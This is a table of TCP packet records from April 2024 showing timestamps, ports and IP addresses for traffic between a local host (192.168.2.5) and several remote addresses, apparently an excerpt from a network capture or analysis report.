Apr 19, 2024 19:21:30.216588020 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.216660023 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.216681004 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.216764927 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.217451096 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.217528105 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.217556953 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.217628956 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.218395948 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.218498945 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.218516111 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.218532085 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.218561888 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.218611956 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.219316959 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.219409943 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.219430923 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.219501972 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.221271992 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.221292973 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.221342087 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.221358061 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.221366882 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.221440077 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.223128080 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.223185062 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.223222971 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.223228931 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.223294973 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.224978924 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.225020885 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.225053072 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.225059032 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.225126028 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.226833105 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.226885080 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.226903915 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.226911068 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.226959944 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.228739023 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.228785992 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.228818893 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.228826046 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.228863955 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.230509043 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.230552912 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.230596066 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.230602026 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.230644941 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.232801914 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.232851982 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.232872963 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.232880116 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.232928991 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.258383989 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.258438110 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.258465052 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.258471966 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.258522987 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.314954996 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.315032959 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.315059900 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.315073967 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.315131903 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.316704988 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.316786051 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.316813946 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.316828966 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.316865921 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.316888094 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.319050074 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.319097996 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.319132090 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.319139004 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.319183111 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.320600986 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.320683002 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.320697069 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.320705891 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.320745945 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.322463989 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.322514057 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.322551966 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.322559118 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.322606087 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.324182987 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.324233055 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.324265003 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.324271917 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.324402094 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.325886011 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.325932026 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.325970888 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.325977087 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.326025009 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.328557968 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.328639984 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.328658104 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.328665972 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.328711033 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.330066919 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.330184937 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.330220938 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.330226898 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.330277920 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.330868959 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.330936909 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.330944061 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.330986977 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.331015110 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.331017971 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.331037998 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.331042051 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.331080914 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.331119061 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:31.224807024 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:31.425529957 CEST | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:31.425738096 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:31.428672075 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:31.654705048 CEST | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:31.656609058 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:31.857450962 CEST | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:31.860975981 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:31.906713009 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:31.971582890 CEST | 49720 | 80 | 192.168.2.5 | 178.237.33.50 |
Apr 19, 2024 19:21:32.064387083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.064480066 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.064948082 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.178162098 CEST | 80 | 49720 | 178.237.33.50 | 192.168.2.5 |
Apr 19, 2024 19:21:32.178256989 CEST | 49720 | 80 | 192.168.2.5 | 178.237.33.50 |
Apr 19, 2024 19:21:32.178435087 CEST | 49720 | 80 | 192.168.2.5 | 178.237.33.50 |
Apr 19, 2024 19:21:32.272414923 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.272453070 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.272471905 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.272492886 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.272520065 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.272561073 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.391448975 CEST | 80 | 49720 | 178.237.33.50 | 192.168.2.5 |
Apr 19, 2024 19:21:32.391576052 CEST | 49720 | 80 | 192.168.2.5 | 178.237.33.50 |
Apr 19, 2024 19:21:32.406609058 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.477554083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477617979 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477662086 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477699995 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477740049 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477778912 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477834940 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.477838993 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.477838993 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.477838993 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.477876902 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.478113890 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.668590069 CEST | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677875996 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677902937 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677921057 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677938938 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677957058 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677970886 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.677975893 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.677994967 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678004980 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.678014040 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678014040 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.678031921 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678060055 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678076029 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678092957 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678109884 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678128004 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678144932 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678164005 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.678256989 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.678256989 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.678256989 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.678257942 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.678257942 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.878484964 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878555059 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878595114 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878633976 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878674984 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878715038 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878737926 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.878737926 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.878755093 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878772020 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.878799915 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878838062 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878875971 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878912926 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878940105 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.878954887 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.878972054 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.878995895 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879038095 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879076958 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879115105 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879146099 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879146099 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879152060 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879178047 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879189968 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879229069 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879239082 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879267931 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879304886 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879343033 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879348993 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879383087 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879420996 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879427910 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879458904 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879498005 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879506111 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879537106 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879542112 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879575968 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879616976 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879633904 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.879654884 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879693031 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879729986 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:32.879739046 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:32.882936954 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080014944 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080082893 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080153942 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080197096 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080238104 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080244064 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080244064 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080276966 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080315113 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080353022 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080394983 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080434084 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080471992 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080486059 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080486059 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080487013 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080512047 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080549002 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080557108 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080591917 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080629110 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080636978 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080667973 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080708027 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080745935 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080754042 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080787897 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080826044 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080833912 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080863953 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080869913 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080908060 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080945969 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.080955029 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.080985069 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081023932 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081032991 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081064939 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081104040 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081141949 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081150055 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081181049 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081221104 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081228971 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081259966 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081279039 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081296921 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081335068 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081373930 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
